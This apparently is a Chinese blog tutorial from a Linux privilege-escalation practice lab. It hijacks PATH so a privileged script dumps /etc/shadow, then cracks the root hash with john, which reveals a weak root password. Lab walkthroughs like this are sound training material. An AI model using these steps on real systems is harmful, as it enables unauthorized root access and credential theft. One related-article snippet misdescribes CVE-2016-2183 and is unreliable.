Escalate_Linux(3)--通过读取密码文件shadow来破解root用户的口令实现提权

已于 2024-02-25 09:47:01 修改
阅读量540 收藏 9
点赞数 7
分类专栏: Escalate_Linux靶机教程 文章标签: linux 哈希算法 运维
于 2024-02-22 15:40:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_75023818/article/details/136235682
版权

通过读取密码文件shadow来破解root用户的口令实现提权

通过读取密码文件/etc/shadow来破解root用户的口令

ls -l /etc/shadow 普通用户无查看shadow权限

echo "cat /etc/shadow" >/tmp/ls
​
chmod 755 /tmp/ls
​
export PATH=/tmp:$PATH
​
/home/user5/script

看到了root密码信息,第二部分为root密码hash

接下来对root密码进行破解

hash密码破解工具hashcat

john密码破解工具 (默认字典文件)

echo "root:$6$mqjgcFoM$X/qNpZR6gXPAxdgDjFpaD1yPIqUF5l5ZDANRTKyvcHQwSqSxX5lA7n22kjEkQhSP6Uq7cPaYfzPSmgATM9cwD1" > hash .txt

注意要用单引号!

使用john破解:

root采用了弱口令,密码为12345

显示破解的密码john --show hash.txt

苏生要努力
关注
  • 7
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
ansible-raspberry-docker:Ansible角色,在Raspberry Pi OS上管理Docker CE
03-18
$ ansible-galaxy install escalate.raspberry_docker 角色变量 请参阅以获取可以覆盖的变量的完整列表。 依存关系 该角色依赖于以下依赖关系: 角色: 集合: 剧本范例 - hosts: all roles: - role: escalate....
ansible-ha-bridge-docker:在Raspbian和Debian OS上使用systemd管理ha-bridge Docker容器
05-11
我建议使用Ansible Galaxy角色来管理Docker守护程序。 已使用大于等于2.4的Ansible版本测试了此角色。安装$ ansible-galaxy install escalate.ha-bridge-docker角色变量请参阅以获取可以覆盖的变量的完整列表。依存...
Linux密码破解(非远程爆破)
qq_42465440的博客
08-10 3457
Linux系统账号密码破解
linux 密码文件 /etc/shadow,SHA512 破解
自我---追梦的博客
07-06 8036
{用户名}:{加密后的口令密码}:{口令最后修改时间距原点(1970-1-1)的天数}:{口令最小修改间隔(防止修改口令,如果时限未到,将恢复至旧口令):{口令最大修改间隔}:{口令失效前的警告天数}:{账户不活动天数}:{账号失效天数}:{保留}所有伪用户密码都是 “!” 或 “*”,代表没有密码是不能登录的。当然,新创建的用户如果不设定密码,那么它的密码项也是 “!注意,这串密码产生的乱码不能手工修改,如果手工修改,系统将无法识别密码,导致密码失效。比较复杂的密码,进行破解花费的时间会长一些。
linux口令相关(passwd/shadow
02-27 5701
      在linux中,口令文件在/etc/passwd中,早期的这个文件直接存放加密后的密码,前两位是"盐"值,是一个随机数,后面跟的是加密的密码。为了安全,现在的linux都提供了 /etc/shadow这个影子文件,密码放在这个文件里面,并且是只有root可读的。下面来分析一下/etc/passwd文件,他的每个条目有7个域,分别是名字:密码用户id:组id:用户信息:主目录:sh
/etc/shadow可以破解吗?
coderge's CSDN Blog.
04-21 5841
文章目录小贴士场景/etc/shadow文件介绍什么是加盐?能破解吗?References 小贴士 哈希(又称为散列算法)不是加密,不是编码;哈希是不可逆的,加密可逆;编码解码不需要密钥,加解密需要密钥 常见的编码 & 哈希 & 加解密算法如下 编码:base64 Hex编码 Huffman编码 哈希:md5 SHA-1 SHA-128 SHA-256 SHA-512 SM3 加密: ​ - 对称加密(加解密密钥一样):DES AES SM4 ​ - 非对称加密(加解密密
linux密码破解[离线]--john 探测(爆破)弱口令(包含linux机器,aix小机)/linux上的shadow文件破解,亲测可用
guijianchouxyz的博客
08-09 5483
基本思路所有涉及的安装包: 链接:https://pan.baidu.com/s/1oItHEHCEdmAMWGY0thQM3g 提取码:hgdr –来自百度网盘超级会员V3的分享我这边使用的是john-1.9.0-jumbo-1.tar这个版本的,这个是我这个时候官网上面的最新的版本,还是建议大家使用最新版本的,多年来的吃亏经验分享一下 上图就是刚解压出来的(红框框里面二点是刚解压出来的哈,其余两个是我已经安装好了) 二、来吧,测试一下 我的虚机的密码是A123456 可以看出来,已经给破解或者探测出
shadow文件的MD5密码破解
Onlyone_1314的博客
02-10 8891
shadow文件的MD5密码破解 root:$1$abcde$LULigrJwcdszq2ReOX7bG/:15933:0:99999:7::: hint:密码长度不超过6 root:$1$abcde$LULigrJwcdszq2ReOX7bG/:15933:0:99999:7:::这是在linux下的shadow文件中,用来存放用户的账户和密码,在/etc/shadow目录下。 其内容用“:”号隔开,分别表示不同的内容: 1)“登录名”(root):是与/etc/passwd文件中的登录名相一致的用户
john破解shadow root密文登录提权
mingyqf的博客
02-17 1032
1.进入/usr/share/wordlists/路径下kali自带的密码字典rockyou.txt.gz进行解压:gzip -d rockyou.txt.gz
ansible-raspberry-systemd-timesyncd:Ansible角色,在Raspberry Pi OS上管理systemd-timesyncd
03-19
$ ansible-galaxy install escalate.timesyncd 角色变量 请参阅以获取可以覆盖的变量的完整列表。 依存关系 该角色依赖于以下依赖关系: 角色:无 集合: 剧本范例 - hosts: all roles: - role: escalate....
Privileged Attack Vectors--2018
09-26
Know how identities, credentials, passwords, and exploits can be leveraged to escalate privileges during an attack Implement defensive and auditing strategies to mitigate the threats and risk ...
escalate:纯OCaml中Deflate算法的实现
06-02
目前正在解析压缩的文件。 膨胀支持 部分地 未压缩 是的 固定霍夫曼 是的 动态霍夫曼 不 尚未实施压缩。 减少支持 不 未压缩 不 固定霍夫曼 不 动态霍夫曼 不 DEFLATE 流可以是许多容器的一部分。 计划实施最常见...
kalilinux解密shadow文件root密码sha512解密方法
2403_82545517的博客
02-04 1470
1,复制出/etc/shadowroot加密信息,保存到kalilinux桌面1.txt。2.txt解密后文件 123456.txt生成密码字典文件。解密后密码会记录在2.txt文件中。
第九天 03-破解linux密码
qq_56414082的博客
01-03 1124
普通用户权限能够查看一般etc/passwd中一行记录对应着一个用户,每行记录又被冒号()分隔为7以第一列用户信息root为例:1. 用户名 -root2. 是密码占位符,x表示密码保存在`/etc/shadow`3. UID user id,0为特权用户超管root,1-499为系统用户内置,500-999也是给计算机用的,1000+是给普通用户用的。4. GID,表示所在组,groupID,组号,每个文件都会有对应的用户和组,用户本身会有基本组和附加组。
linux 密码文件 /etc/shadow md5,SHA256,SHA512 破解
whatday的专栏
08-24 1万+
目录 环境 shadow文件解析 John the Ripper 安装John the Ripper 破解 环境 Kali系统 John the Ripper密码破解shadow文件解析 文件的格式为: {用户名}:{加密后的口令密码}:{口令最后修改时间距原点(1970-1-1)的天数}:{口令最小修改间隔(防止修改口令,如果时限未到,将恢复至旧口令):{口令最大修改间隔}:{口令失效前的警告天数}:{账户不活动天数}:{账号失效天数}:{保留} 其中{加密后的口令密码}的格式
John the Ripper jumbo破解Linux密码文件/etc/shadow获取用户密码
WuYan_Emperor的博客
08-09 1687
John the Ripper jumbo破解Linux密码文件/etc/shadow获取用户密码 破解时提示`Using default input encoding: UTF-8 No password hashes loaded (see FAQ)`,可以加上`--show`或者`--format=crypt`
linux中查看用户密码密码破解(加密方式)详解(/etc/shadow文件)
热门推荐
学无止境
04-12 10万+
我们知道linux是一个多用户的操作系统,也就是说在linux系统中存储着很多不同用户用户名及密码。那么如果某一个用户密码忘记了怎么办呢? 首先我们得知道,在linux系统中,用户名被存放在了/etc/passwd这个文件中;密码存放在/etc/shadow中。知道这两条重要的信息,那么后面的事情就简单很多了。 如果我们要查看某个用户密码,我们得先登陆为超级用户才可查看: su ro...
/etc/shadow文件详解
good good study
03-11 2147
etc/shadowLinux 系统中存储用户加密密码的文件,每行对应一个用户的加密信息。该文件只有系统管理员 root 用户可以访问。
Linux】进程间通信——匿名管道
最新发布
2201_76024104的博客
07-08 704
1.:一个进程需要将它的数据发送给另一个进程,比如我们有两个进程,一个负责获取数据,另一个负责处理数据,这时第一个进程就要将获取到的数据交给第二个进程2.:多个进程间共享同样的资源3.:一个进程需要给其他进程发送消息,通知他们发生了某种事件4.:有些事件需要完全控制另一个进程,比如我们在使用gdb调试时,gdb就是一个进程,它控制了我们要调试的进程进程之前是有互相传递信息的需求,但是,一个进程不可能去另一个进程的地址空间中取信息,所以这就要求操作系统去提供一块交换数据的空间来供进程之间使用。
linux CVE-2016-2183)
08-25
CVE-2016-2183 is a vulnerability that was found in the Linux kernel. This vulnerability allows local users to gain root privileges by leveraging a race condition in the keyring implementation. By exploiting this vulnerability, an attacker can escalate their privileges and gain unauthorized access to the system. It is recommended to apply the relevant patches or updates provided by the Linux distribution to mitigate this vulnerability.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值